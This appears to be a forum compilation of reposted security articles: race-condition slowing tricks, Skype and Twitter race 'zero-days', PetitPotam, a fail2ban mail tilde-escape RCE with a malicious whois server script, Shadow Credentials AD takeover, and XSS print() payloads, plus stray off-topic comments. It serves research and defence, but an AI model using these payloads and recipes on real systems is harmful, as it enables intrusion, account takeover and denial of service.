Slowing down the execution of the target program is almost vital to achieving race conditions consistently, so here I will describe some of the common methods that can be used to do this. Some of these methods are outdated and will only work on older systems, but they are still worth including (especially if you're into CTFs).

Deep symlink nesting (described further below) is one old method that can be used to slow down program execution in order to aid race conditions.

Another method is changing the value of the environment variable LD_DEBUG: setting it results in output being sent to stderr, and if you then redirect stderr to a pipe, it can slow down or completely halt the setuid binary in question. To do this you would do something as follows:

    LD_DEBUG=all some_program 2>&1

Usage of LD_DEBUG is somewhat outdated and no longer relevant for setuid binaries since the upgrade to glibc 2.3.4; that being said, it can still be used for some more esoteric bugs affecting legacy systems, and is also occasionally seen in solutions for CTFs.

Another method of slowing down program execution is lowering its scheduling priority through use of the nice or renice commands. Technically, this isn't slowing down the program execution as such; rather, it forces the Linux scheduler to allocate fewer time slices towards the execution of the program, resulting in it running at a slower rate. It should also be noted that this can be achieved within code (rather than as a terminal command) through use of the nice() syscall. If the value for nice is negative, the process runs with higher priority; if it is positive, the process runs with lower priority. For example, setting the following value will cause the process to run at a ridiculously slow rate (a short sketch of scripting this appears below):

    nice(19)

If you're familiar with writing Linux rootkits, then you may already be aware of these methods, but you can also use dynamic linker tricks via LD_PRELOAD in order to slow down the execution of processes. This can be done by hooking common functions such as malloc() or free(); once said functions are called within the vulnerable program, their speed of execution is slowed down to a nominal extent.

One extremely trivial way of slowing down the execution of a program is to simply run it within a virtualized environment. If you're using a virtual machine, there should be options available that allow you to limit the allocated amount of CPU resources and RAM, allowing you to test the potentially vulnerable program in a more controlled environment where you can slow things down with ease and with a lot of control. This method will only work while testing for certain classes of race conditions.
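A sketch of driving the scheduling-priority trick above from an attack script: os.nice() and preexec_fn are standard Python, while ./vuln and its arguments are hypothetical placeholders:

    import os
    import subprocess

    # Launch the target with the lowest scheduling priority so its
    # check-then-use window stays open for as long as possible.
    proc = subprocess.Popen(
        ["./vuln", "/tmp/output", "payload"],
        preexec_fn=lambda: os.nice(19),  # runs in the child, before exec
    )
    proc.wait()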
One crude method to slow down program/process execution speeds, in order to increase the chance of a race condition occurring, is taking physical measures to overheat your computer, putting strain on its ability to perform computational tasks. Obviously, this is dangerous for the health of your device, so don't come crying to me if you wind up breaking your computer. There are many ways to do this, but the way I've seen it done (which, according to my crazy IRL hacker friend, is supposedly one of the safer methods of physically overheating your computer) is to simply wet a towel (or a bunch of towels) and wrap them around your device while making sure that the fan in particular is covered completely.

Deep symlinks can also be used to slow down the execution of the program, which is extremely valuable while attempting to exploit race conditions. This is a very old and well-documented method, although these days it is practically useless (unless you're exploiting some old obscure system, or doing it for a CTF; I have seen this method utilized in CTF challenges before). Since Linux kernel 2.4.x, this method has been mitigated through the implementation of a limit on the maximum number of symlink dereferences permitted during lookups, alongside limits on nesting depths. Despite this method being practically dead, I figured it's still worth covering because there are still some obscure cases where it can be utilized. A script written by Rafal Wojtczuk demonstrates how this can be done (the example shown here can be found at Hacker's Hut; the script itself was an image in the original post, and a reconstruction is sketched at the end of this section). It will cause the kernel to take a ridiculously long length of time to access a single file. Here is the situation presented when the script is executed:

    drwxr-xr-x 2 aeb 4096 l
    lrwxrwxrwx 1 aeb   53 l0 -> l1/../l1/../l1/../l/../../../../../../../etc/services
    lrwxrwxrwx 1 aeb   19 l1 -> l2/../l2/../l2/../l
    lrwxrwxrwx 1 aeb   19 l2 -> l3/../l3/../l3/../l
    lrwxrwxrwx 1 aeb   19 l3 -> l4/../l4/../l4/../l
    lrwxrwxrwx 1 aeb   19 l4 -> l5/../l5/../l5/../l
    drwxr-xr-x 2 aeb 4096 l5

The more parameters passed to the script, the larger the depth of the symlinks, meaning it can take days or even weeks for the one process to finish. On older machines, this will result in application-level DoS. There are many other ways in which symbolic links can be abused in order to achieve race conditions; if you want to learn more about this, I'd suggest googling, as there's simply too much to explain in a single blog post.

Yet another method to slow down program execution is increasing the timer interrupt frequency in order to force more load onto the kernel. Timer interrupts within the Linux kernel have a long and extensive history, so I will not be going in-depth here. In part 2 of this tutorial series you can expect many more advanced methods to slow down process execution.
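Since the original symlink-nesting script was not reproduced in this repost, here is a hedged Python reconstruction that recreates the exact structure shown in the listing above (the directory and link names are taken from the listing; the depth is fixed at 5 for illustration):

    import os

    DEPTH = 5  # l1..l4 chained between the plain directories l and l5

    os.mkdir("l")   # plain directory the chain keeps bouncing through
    os.mkdir("l5")  # plain directory terminating the chain

    # l4 -> l5/../l5/../l5/../l, l3 -> l4/../l4/../l4/../l, and so on
    for i in range(DEPTH - 1, 0, -1):
        nxt = "l%d" % (i + 1)
        os.symlink("%s/../%s/../%s/../l" % (nxt, nxt, nxt), "l%d" % i)

    # l0 funnels the whole chain toward /etc/services
    os.symlink("l1/../l1/../l1/../l/../../../../../../../etc/services", "l0")

On a kernel without dereference limits, every open("l0") forces an enormous number of symlink resolutions; modern kernels simply fail the lookup with ELOOP.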
Final notes (and zero-days):

I intentionally chose to leave out a number of methods for testing/exploiting race condition bugs within web applications, although I'll be covering these in depth in Part 2 of my race condition series. Meanwhile, I'll give you an overview of what you can expect from Part 2, while also leaving you two race condition 0day exploits to (ethically) play around with. The second part of my tutorial series on race conditions is going to have a primary emphasis on race conditions in webapps, which I touched upon lightly in this post.

This post was my attempt at explaining what race conditions are, how they work, how to (ab)use them, and the implications of their existence with regard to bug bounty hunting. Now that I've covered what these bugs are and provided a few examples of real working exploits demonstrating that race conditions do indeed exist within webapps, I'm going to spend most of part two covering the following three areas:

- More advanced techniques for identifying race conditions specifically within web applications, methods of bypassing protections against them, and lucrative sections of webapps to test in order to increase your chances of finding race condition bugs on a regular basis.
- More advanced (and several private) techniques used to slow down process execution, both within regular applications and within web applications (although mostly with emphasis on web applications, since that will be the primary theme of Part 2), and how to use some practical dynamic linker tricks through the hooking of (g)libc functions via LD_PRELOAD in userland/ring3, exactly like you would do with a rootkit, but with the emphasis on slowing down program/process execution via the added strain on hooked common functions, as opposed to using the dynamic linker for stealth-based hooking. We are talking about exploiting race conditions here, not writing rootkits; some of these techniques are kind-of interchangeable, but the methods I'll be sharing would be very inefficient for an LD_PRELOAD-based rootkit, as they would make the victim's machine slow as shit. For maintaining persistence on a hacked box, this is terrible; for slowing down process execution to increase the odds of a race condition, this is great! You can expect me to expand upon dozens of methods of slowing down process execution to increase your odds of winning that race!
- Finally, just like this first part of my race condition exploitation series, I'll be setting a trend by once again including two new zero-day exploits, both of which are race condition bugs.

Skype Race Condition 0day:

- Create a Skype group chat
- Add a bunch of people
- Make two Skype bots and add them to the chat
- Have one bot repeatedly set the topic to 'lol' (lowercase)
- Have the other bot repeatedly set the topic to 'LOL' (uppercase); for example, bot #1 repeatedly sends "/topic lololol" to the chat and bot #2 repeatedly sends "/topic LOLOLOL"

If performed correctly, this will break the Skype client for everyone in the group chat. Every time they reload Skype, it will crash. It also makes it impossible for them to leave the group chat, no matter what they try. The only way around this is to either create a fresh Skype account, or completely uninstall Skype, access Skype via the web (web.skype.com) to leave the group, and then reinstall Skype again.

Twitter API TOC/TOU Race Condition 0day:

There was a race condition bug affecting Twitter's API. This is a generic TOC/TOU race condition which allows various forms of unexpected behaviour to take place. By sending API requests concurrently to Twitter, it can result in the deletion of other people's likes/retweets/followers. You would write a script with multiple threads, some threads sending an API request to retweet or like a tweet (from a third-party account), and the other threads simultaneously removing likes/RTs of the same tweet from the same third-party account, once again making requests to Twitter's API in order to do so.
As a result of the race condition taking place, this removes multiple likes and retweets from the affected post, rather than only the likes and retweets set to be removed via the API requests sent from the third-party account. While this has no direct security impact, it can drastically affect the outreach of a popular tweet. While running this script to simultaneously send the API requests from a third-party account, we managed to reduce a tweet with 2000+ retweets down to 16 retweets in a matter of minutes. The proof-of-concept code for this will be viewable within the "Exploits and Code Examples" section of the upcoming site of 0xFFFF, where we plan to eventually integrate this blog. To see how this works in detail, you can read the full writeup here, published by a member of our team.

That's all for now; part two will be coming soon, with more zerodays and a much bigger emphasis on the exploitation of race condition bugs within web applications.

Sursa: https://blog.0xffff.info/2021/06/23/winning-the-race-signals-symlinks-and-toc-tou/
11. New PetitPotam NTLM Relay Attack Lets Hackers Take Over Windows Domains

July 26, 2021 | Ravie Lakshmanan

A newly uncovered security flaw in the Windows operating system can be exploited to coerce remote Windows servers, including Domain Controllers, into authenticating with a malicious destination, thereby allowing an adversary to stage an NTLM relay attack and completely take over a Windows domain.

The issue, dubbed "PetitPotam," was discovered by security researcher Gilles Lionel, who shared technical details and proof-of-concept (PoC) code last week, noting that the flaw works by forcing "Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function." MS-EFSRPC is Microsoft's Encrypting File System Remote Protocol, used to perform "maintenance and management operations on encrypted data that is stored remotely and accessed over a network."

Specifically, the attack enables a domain controller to authenticate against a remote server under a bad actor's control using the MS-EFSRPC interface and share its authentication information. This is done by connecting to LSARPC, resulting in a scenario where the target server connects to an arbitrary server and performs NTLM authentication.

"An attacker can target a Domain Controller to send its credentials by using the MS-EFSRPC protocol and then relaying the DC NTLM credentials to the Active Directory Certificate Services AD CS Web Enrollment pages to enroll a DC certificate," TRUESEC's Hasain Alshakarti said. "This will effectively give the attacker an authentication certificate that can be used to access domain services as a DC and compromise the entire domain."

While disabling support for MS-EFSRPC doesn't stop the attack from functioning, Microsoft has since issued mitigations for the issue, while characterizing "PetitPotam" as a "classic NTLM relay attack." Such attacks permit attackers with access to a network to intercept legitimate authentication traffic between a client and a server and relay those validated authentication requests in order to access network services.

"To prevent NTLM Relay Attacks on networks with NTLM enabled, domain administrators must ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) or signing features such as SMB signing," Microsoft noted. "PetitPotam takes advantage of servers where Active Directory Certificate Services (AD CS) is not configured with protections for NTLM Relay Attacks."

To safeguard against this line of attack, the Windows maker recommends that customers disable NTLM authentication on the domain controller. In the event NTLM cannot be turned off for compatibility reasons, the company urges users to take one of the two steps below:

- Disable NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic.
- Disable NTLM for Internet Information Services (IIS) on AD CS Servers in the domain running the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services.

PetitPotam marks the third major Windows security issue disclosed over the past month, after the PrintNightmare and SeriousSAM (aka HiveNightmare) vulnerabilities.

Sursa: https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html
12. fail2ban – Remote Code Execution

JAKUB ŻOCZEK | July 26, 2021 | Research

This article is about the recently published security advisory for a pretty popular piece of software: fail2ban (CVE-2021-32749). The vulnerability could be exploited at scale and lead to root-level code execution on multiple boxes; however, this is rather hard for a regular person to achieve. It all has its roots in the mailutils package, and I found it by total accident when playing with the mail command.

fail2ban analyses logs (or other data sources) in search of brute-force traces in order to block such attempts based on the IP address. There are plenty of rules for different services (SSH, SMTP, HTTP, etc.). There are also defined actions which can be performed after blocking a client. One of these actions is sending an e-mail. If you search the Internet for how to send an e-mail from the command line, you will often get this solution:

    $ echo "test e-mail" | mail -s "subject" user@example.org

That is exactly how one of fail2ban's actions is configured to send e-mails about a client getting blocked (./config/action.d/mail-whois.conf):

    actionban = printf %%b "Hi,\n
                The IP <ip> has just been banned by Fail2Ban after
                <failures> attempts against <name>.\n\n
                Here is more information about <ip> :\n
                `%(_whois_command)s`\n
                Regards,\n
                Fail2Ban"|mail -s "[Fail2Ban] <name>: banned <ip> from <fq-hostname>" <dest>

There is nothing suspicious about the above until you know about one specific thing that can be found in the mailutils manual: tilde escape sequences. The '~!' escape executes the specified command and returns you to mail compose mode without altering your message. When used without arguments, it starts your login shell. The '~|' escape pipes the message composed so far through the given shell command and replaces the message with the output the command produced. If the command produced no output, mail assumes that something went wrong and retains the old contents of your message.

This is the way it works in real life:

    jz@fail2ban:~$ cat -n pwn.txt
         1  Next line will execute command
         2  ~! uname -a
         3
         4  Best,
         5  JZ
    jz@fail2ban:~$ cat pwn.txt | mail -s "whatever" whatever@whatever.com
    Linux fail2ban 4.19.0-16-cloud-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
    jz@fail2ban:~$

If you go back to the previously mentioned fail2ban e-mail action, you can notice that whois output is attached to the e-mail body. So if we could add a tilde escape sequence to the whois output for our IP address, well, it should end up with code execution. As root.

What are our options? As attackers, we need to control the whois output; how do we achieve that? The first thing that came to my mind was kindly asking my ISP to contact RIPE and make a pretty custom entry for my particular IP address. Unfortunately, it doesn't work like that. RIPE/ARIN/APNIC and the others create entries for whole IP ranges at minimum, not for one particular IP address. Also, I'm more than sure that achieving this the formal way is extremely hard, plus putting a malicious payload in a whois entry would make people ask questions. Is there a way to start my own whois server? Surprisingly, there is, and you can find a couple of them running on the Internet. By digging through the whois-related RFCs, you can find information about an attribute called ReferralServer.
If your whois client finds such an attribute in the response, it will query the server set in its value to get more information about the IP address or domain. Just take a look at what happens when getting whois for the 157.5.7.5 IP address:

$ whois 157.5.7.5

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2021, American Registry for Internet Numbers, Ltd.
#

NetRange:       157.1.0.0 - 157.14.255.255
CIDR:           157.4.0.0/14, 157.14.0.0/16, 157.1.0.0/16, 157.12.0.0/15, 157.2.0.0/15, 157.8.0.0/14
NetName:        APNIC-ERX-157-1-0-0
NetHandle:      NET-157-1-0-0-1
Parent:         NET157 (NET-157-0-0-0-0)
NetType:        Early Registrations, Transferred to APNIC
OriginAS:
Organization:   Asia Pacific Network Information Centre (APNIC)

[… cut …]

ReferralServer:  whois://whois.apnic.net
ResourceLink:    http://wq.apnic.net/whois-search/static/search.html

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net

[… cut …]

Found a referral to whois.apnic.net.

% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '157.0.0.0 - 157.255.255.255'

% Abuse contact for '157.0.0.0 - 157.255.255.255' is 'helpdesk@apnic.net'

inetnum:        157.0.0.0 - 157.255.255.255
netname:        ERX-NETBLOCK
descr:          Early registration addresses

[… cut …]

In theory, with a pretty big network, you could probably ask your Regional Internet Registry to use RWhois for your network. On the other hand – simply imagine black hats breaking into a server running rwhois, putting a malicious entry there and then starting the attack. To be fair, this scenario seems way easier than becoming a big company in order to legally run your own whois server. And if you're a government that can simply control network traffic – the task is easier still.

By taking a closer look at the whois protocol, we notice a few things: it was designed a really long time ago; it's pretty simple (you ask for an IP or domain name and get raw output); and it's unencrypted at the network level. By performing a MITM attack on such an unencrypted protocol, attackers could just inject the tilde escape sequence and start an attack against multiple hosts at once.

It's worth remembering that the root problem here is mailutils, which has this flaw by design. I believe a lot of people are unaware of this feature, and there's still plenty of software that could be using the mail command this way. As has been seen many times in history – security is hard and complex. Sometimes a totally innocent piece of functionality, one you would never suspect of being a threat, can be the cause of a dangerous vulnerability.
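To make the MITM/rogue-referral scenario concrete, here is a minimal sketch of a malicious whois server. whois speaks plain TCP on port 43: read one query line, write the answer, close. Everything here is a hypothetical illustration, and the payload uses a harmless id command:

import socket

# Tilde escapes are interpreted by mailutils' mail(1) when this
# "whois record" ends up inside a composed message body, as in mail-whois.conf.
PAYLOAD = b"inetnum: 198.51.100.0 - 198.51.100.255\n~! id\n"

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 43))  # whois/tcp; needs root or CAP_NET_BIND_SERVICE
srv.listen(5)

while True:
    conn, peer = srv.accept()
    query = conn.recv(1024)          # e.g. b"198.51.100.7\r\n"
    print("query from", peer, query)
    conn.sendall(PAYLOAD)            # poisoned whois answer
    conn.close()

A client pointed at it (e.g. whois -h <attacker-ip> 198.51.100.7) receives the poisoned record, and anything that pipes that output through mail's compose mode — like the actionban shown earlier — would execute the escape.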
Author: Jakub Żoczek

Sursa: https://research.securitum.com/fail2ban-remote-code-execution/

13. Key-Checker

Go scripts for checking API key / access token validity.

Update V1.0.0 🚀 Added 37 checkers!

Screenshot 📷

How to Install:

go get github.com/daffainfo/Key-Checker
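The idea behind such checkers (and the keyhacks list referenced below) is simple: hit a cheap authenticated endpoint and inspect the status code. A hedged Python illustration for a GitHub token — not Key-Checker's actual code:

import requests  # pip install requests

def github_token_valid(token: str) -> bool:
    # A cheap authenticated endpoint: 200 for a live token, 401 otherwise.
    resp = requests.get(
        "https://api.github.com/user",
        headers={"Authorization": "token " + token},
        timeout=10,
    )
    return resp.status_code == 200

print(github_token_valid("ghp_example_not_a_real_token"))  # -> False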
Reference 📚 https://github.com/streaak/keyhacks

Sursa: https://github.com/daffainfo/Key-Checker

14. Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover

Elad Shamir

The techniques for DACL-based attacks against User and Computer objects in Active Directory have been established for years. If we compromise an account that has delegated rights over a user account, we can simply reset their password, or, if we want to be less disruptive, we can set an SPN or disable Kerberos pre-authentication and try to roast the account. For computer accounts, it is a bit more complicated, but RBCD can get the job done. These techniques have their shortcomings:

- Resetting a user's password is disruptive, may be reported, and may not be permitted per the Rules of Engagement (ROE).
- Roasting is time-consuming and depends on the target having a weak password, which may not be the case.
- RBCD is hard to follow because someone (me) failed to write a clear and concise post about it.
- RBCD requires control over an account with an SPN, and creating a new computer account to meet that requirement may lead to detection and cannot be cleaned up until privilege escalation is achieved.

The recent work that Will Schroeder (@harmj0y) and Lee Christensen (@tifkin_) published about AD CS made me think about other technologies that use Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos, and Windows Hello for Business was the obvious candidate, which led me to (re)discover an alternative technique for user and computer object takeover.

Tl;dr: It is possible to add "Key Credentials" to the attribute msDS-KeyCredentialLink of the target user/computer object and then perform Kerberos authentication as that account using PKINIT. In plain English: this is a much easier and more reliable takeover primitive against Users and Computers. A tool to operationalize this technique has been released alongside this post.

Previous Work

When I looked into Key Trust, I found that Michael Grafnetter (@MGrafnetter) had already discovered this abuse technique and presented it at Black Hat Europe 2019. His discovery of this user and computer object takeover technique somewhat flew under the radar, I believe because this technique was only the primer to the main topic of his talk. Michael clearly demonstrated this abuse in his talk and noted that it affected both users and computers. In his presentation, Michael explained some of the inner workings of WHfB and the Key Trust model, and I highly recommend watching it. Michael has also been maintaining a library called DSInternals that facilitates the abuse of this mechanism, and a lot more. I recently ported some of Michael's code to a new C# tool called Whisker to be used via implants on operations. More on that below.

What is PKINIT?

In Kerberos authentication, clients must perform "pre-authentication" before the KDC (the Domain Controller in an Active Directory environment) provides them with a Ticket Granting Ticket (TGT), which can subsequently be used to obtain Service Tickets. The reason for pre-authentication is that without it, anyone could obtain a blob encrypted with a key derived from the client's password and try to crack it offline, as done in the AS-REP Roasting attack. The client performs pre-authentication by encrypting a timestamp with their credentials to prove to the KDC that they have the credentials for the account. Using a timestamp rather than a static value helps prevent replay attacks.
The symmetric key (secret key) approach, the one most widely used and known, uses a symmetric key derived from the client's password, AKA the secret key. If using RC4 encryption, this key would be the NT hash of the client's password. The KDC has a copy of the client's secret key and can decrypt the pre-authentication data to authenticate the client. The KDC uses the same key to encrypt a session key sent to the client along with the TGT.

PKINIT is the less common, asymmetric key (public key) approach. The client has a public-private key pair and encrypts the pre-authentication data with their private key, and the KDC decrypts it with the client's public key. The KDC also has a public-private key pair, allowing for the exchange of a session key using one of two methods:

Diffie-Hellman Key Delivery

Diffie-Hellman Key Delivery allows the KDC and the client to securely establish a shared session key that cannot be intercepted by attackers performing passive man-in-the-middle attacks, even if the attacker has the client's or the KDC's private key, (almost) providing Perfect Forward Secrecy. I say almost because the session key is also stored inside the encrypted part of the TGT, which is encrypted with the secret key of the KRBTGT account.

Public Key Encryption Key Delivery

Public Key Encryption Key Delivery uses the KDC's private key and the client's public key to envelop a session key generated by the KDC.

Traditionally, Public Key Infrastructure (PKI) allows the KDC and the client to exchange their public keys using Digital Certificates signed by an entity that both parties have previously established trust with — the Certificate Authority (CA). This is the Certificate Trust model, which is most commonly used for smartcard authentication.

PKINIT is not possible out of the box in every Active Directory environment. The key (pun intended) is that both the KDC and the client need a public-private key pair. However, if the environment has AD CS and a CA available, the Domain Controller will automatically obtain a certificate by default.

No PKI? No Problem!

Microsoft also introduced the concept of Key Trust, to support passwordless authentication in environments that don't support Certificate Trust. Under the Key Trust model, PKINIT authentication is established based on the raw key data rather than a certificate. The client's public key is stored in a multi-value attribute called msDS-KeyCredentialLink, introduced in Windows Server 2016. The values of this attribute are Key Credentials, which are serialized objects containing information such as the creation date, the distinguished name of the owner, a GUID that represents a Device ID, and, of course, the public key. It is a multi-value attribute because an account can have several linked devices. This trust model eliminates the need to issue client certificates for everyone using passwordless authentication. However, the Domain Controller still needs a certificate for the session key exchange. This means that if you can write to the msDS-KeyCredentialLink property of a user, you can obtain a TGT for that user.

Windows Hello for Business Provisioning and Authentication

Windows Hello for Business (WHfB) supports multi-factor passwordless authentication. When the user enrolls, the TPM generates a public-private key pair for the user's account — the private key should never leave the TPM.
Next, if the Certificate Trust model is implemented in the organization, the client issues a certificate request to obtain a trusted certificate from the environment’s certificate issuing authority for the TPM-generated key pair. However, if the Key Trust model is implemented, the public key is stored in a new Key Credential object in the msDS-KeyCredentialLink attribute of the account. The private key is protected by a PIN code, which Windows Hello allows replacing with a biometric authentication factor, such as fingerprint or face recognition. When a client logs in, Windows attempts to perform PKINIT authentication using their private key. Under the Key Trust model, the Domain Controller can decrypt their pre-authentication data using the raw public key in the corresponding NGC object stored in the client’s msDS-KeyCredentialLink attribute. Under the Certificate Trust model, the Domain Controller will validate the trust chain of the client’s certificate and then use the public key inside it. Once pre-authentication is successful, the Domain Controller can exchange a session key via Diffie-Hellman Key Delivery or Public Key Encryption Key Delivery. Note that I intentionally used the term “client” rather than “user” here because this mechanism applies to both users and computers. What About NTLM? PKINIT allows WHfB users, or, more traditionally, smartcard users, to perform Kerberos authentication and obtain a TGT. But what if they need to access resources that require NTLM authentication? To address that, the client can obtain a special Service Ticket that contains their NTLM hash inside the Privilege Attribute Certificate (PAC) in an encrypted NTLM_SUPPLEMENTAL_CREDENTIAL entity. The PAC is stored inside the encrypted part of the ticket, and the ticket is encrypted using the key of the service it is issued for. In the case of a TGT, the ticket is encrypted using the key of the KRBTGT account, which the user should not be able to decrypt. To obtain a ticket that the user can decrypt, the user must perform Kerberos User to User (U2U) authentication to itself. When I first read the title of the RFC for this mechanism, I thought to myself, “Does that mean we can abuse this mechanism to Kerberoast any user account? That must be too good to be true”. And it was — the risk of Kerberoasting was taken into consideration, and U2U Service Tickets are encrypted using the target user’s session key rather than their secret key. That presented another challenge for the U2U design — every time a client authenticates and obtains a TGT, a new session key is generated. Also, KDC does not maintain a repository of active session keys — it extracts the session key from the client’s ticket. So, what session key should the KDC use when responding to a U2U TGS-REQ? The solution was sending a TGS-REQ containing the target user’s TGT as an “additional ticket”. The KDC will extract the session key from the TGT’s encrypted part (hence not really perfect forward secrecy) and generate a new service ticket. So, if a user requests a U2U Service Ticket from itself to itself, they will be able to decrypt it and access the PAC and the NTLM hash. This means that if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user. As per MS-PAC, the NTLM_SUPPLEMENTAL_CREDENTIAL entity is added to the PAC only if PKINIT authentication was performed. 
Back in 2017, Benjamin Delpy (@gentilkiwi) introduced code to Kekeo to support retrieving the NTLM hash of an account using this technique, and it will be added to Rubeus in an upcoming release.

Abuse

When abusing Key Trust, we are effectively adding alternative credentials to the account, or "Shadow Credentials", allowing for obtaining a TGT and subsequently the NTLM hash for the user/computer. Those Shadow Credentials would persist even if the user/computer changed their password.

Abusing Key Trust for computer objects requires additional steps after obtaining a TGT and the NTLM hash for the account. There are generally two options:

- Forge an RC4 silver ticket to impersonate privileged users to the corresponding host.
- Use the TGT to call S4U2Self to impersonate privileged users to the corresponding host. This option requires modifying the obtained Service Ticket to include a service class in the service name.

Key Trust abuse has the added benefit that it doesn't delegate access to another account which could get compromised — it is restricted to the private key generated by the attacker. In addition, it doesn't require creating a computer account that may be hard to clean up until privilege escalation is achieved.

Whisker

Alongside this post I am releasing a tool called "Whisker". Based on code from Michael's DSInternals, Whisker provides a C# wrapper for performing this attack on engagements. Whisker updates the target object using LDAP, while DSInternals allows updating objects using both LDAP and RPC with the Directory Replication Service (DRS) Remote Protocol.

Whisker has four functions:

- Add — generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
- List — lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
- Remove — removes a key credential from the target object, specified by a DeviceID GUID.
- Clear — removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break.

Requirements

This technique requires the following:

- At least one Windows Server 2016 Domain Controller.
- A digital certificate for Server Authentication installed on the Domain Controller.
- Windows Server 2016 Functional Level in Active Directory.
- Control of an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.

Detection

There are two main opportunities for detection of this technique:

- If PKINIT authentication is not common in the environment or not common for the target account, the "Kerberos authentication ticket (TGT) was requested" event (4768) can indicate anomalous behavior when the Certificate Information attributes are not blank.
- If a SACL is configured to audit Active Directory object modifications for the targeted account, the "Directory service object was modified" event (5136) can indicate anomalous behavior if the subject changing the msDS-KeyCredentialLink is not the Azure AD Connect synchronization account or the ADFS service account, which will typically act as the Key Provisioning Server and legitimately modify this attribute for users.
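As a starting point for such hunting, defenders can enumerate which accounts currently carry values in msDS-KeyCredentialLink and compare that against the set of accounts expected to use WHfB. A minimal sketch with the ldap3 Python library — the server name, credentials and base DN are hypothetical placeholders:

from ldap3 import Server, Connection, NTLM, SUBTREE  # pip install ldap3

# Hypothetical lab values - replace with your own.
server = Server("dc01.corp.example")
conn = Connection(server, user="CORP\\auditor", password="...",
                  authentication=NTLM, auto_bind=True)

# Find every object that has at least one key credential linked.
conn.search(
    search_base="DC=corp,DC=example",
    search_filter="(msDS-KeyCredentialLink=*)",
    search_scope=SUBTREE,
    attributes=["sAMAccountName", "msDS-KeyCredentialLink"],
)

for entry in conn.entries:
    # Each value is a serialized key credential blob; here we only count them.
    print(entry.sAMAccountName, "->", len(entry["msDS-KeyCredentialLink"].values))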
Prevention

It is generally a good practice to proactively audit all inbound object control for highly privileged accounts. Just as users with lower privileges than Domain Admins shouldn't be able to reset the passwords of members of the Domain Admins group, less secure, or less "trustworthy", users with lower privileges should not be able to modify the msDS-KeyCredentialLink attribute of privileged accounts. A more specific preventive control is adding an Access Control Entry (ACE) to DENY the principal EVERYONE from modifying the attribute msDS-KeyCredentialLink for any account not meant to be enrolled in Key Trust passwordless authentication, and particularly privileged accounts. However, an attacker with WriteOwner or WriteDACL privileges will be able to override this control, which can in turn be detected with a suitable SACL.

Conclusion

Abusing Key Trust Account Mapping is a simpler way to take over user and computer accounts in Active Directory environments that support PKINIT for Kerberos authentication and have a Windows Server 2016 Domain Controller with the corresponding functional level.

References

- Whisker by Elad Shamir (@elad_shamir)
- Exploiting Windows Hello for Business (Black Hat Europe 2019) by Michael Grafnetter (@MGrafnetter)
- DSInternals by Michael Grafnetter (@MGrafnetter)

Sursa: https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab
15. Eviatar Gerzi, Security Researcher, CyberArk

Attackers are increasingly targeting Kubernetes clusters to compromise applications or abuse resources for things like crypto-coin mining. Through live demos, this research-based session will show attendees how. Eviatar Gerzi, who researches DevOps security, will also introduce an open source tool designed to help blue and red teams discover and eliminate risky permissions.

Pre-Requisites: Basic experience with Kubernetes and familiarity with Docker containers.
16. Dr. Ruby — I think she's better at other things than medicine. Here is her LinkedIn profile; she is NOT a medical doctor: https://www.linkedin.com/in/dr-jane-ruby-49971411/ Well, actually she is a doctor — a doctor of psychology. They do mention a doctor in the video, a HOMEOPATHIC doctor (they forgot to mention that part). And that guy churns out articles like this every single day. At least take a look at the comments on Facebook — some of them are pertinent. Welcome to the Internet, where whatever anyone says is true.
17. Ooh, this looks like a fun post!
18. alert() is dead, long live print()

James Kettle, Director of Research @albinowax

Published: 02 July 2021 at 13:27 UTC; Updated: 05 July 2021 at 10:03 UTC

Cross-Site Scripting and the alert() function have gone hand in hand for decades. Want to prove you can execute arbitrary JavaScript? Pop an alert. Want to find an XSS vulnerability the lazy way? Inject alert()-invoking payloads everywhere and see if anything pops up.

However, there's trouble brewing on the horizon. Malicious adverts have been abusing our beloved alert to distract and social-engineer visitors from inside their iframe. Google Chrome has decided to tackle this by disabling alert for cross-domain iframes. Cross-domain iframes are often built into websites deliberately, and are also a near-essential component of certain relatively advanced XSS attacks. Once Chrome 92 lands on 20th July 2021, XSS vulnerabilities inside cross-domain iframes will:

- No longer enable alert-based PoCs.
- Be invisible to anyone using alert-based detection techniques.

What next? The obvious workaround is to use prompt or confirm, but unfortunately Chrome's mitigation blocks all dialogs. Triggering a DNS pingback to a listener, OAST-style, is another potential approach, but it is less suitable as a PoC due to the config requirements. We also ruled out console.log(), as console functions are often proxied or disabled by JavaScript obfuscators.

It's quite funny that this "protection" against showing dialogs cross-domain blocks alerts and prompts, but as Yosuke Hasegawa pointed out, they forgot about basic authentication. This works in the current version of Canary, though it's likely to be blocked in the future.

We needed an alert alternative that was:

- Simple, setup-free and easy to remember
- Highly visible, even when executed in an invisible iframe

After weeks of intensive research, we're thrilled to bring you... print()

We will be updating our Web Security Academy labs to support print()-based solutions shortly. The XSS cheat sheet will also be updated to reflect the new print() payloads for use in cross-domain iframes. We'll keep using alert when there are no iframes involved... for now.

Long live print! - Gareth & James

Sursa: https://portswigger.net/research/alert-is-dead-long-live-print
19. CVE-2021-22555: Turning \x00\x00 into 10000$

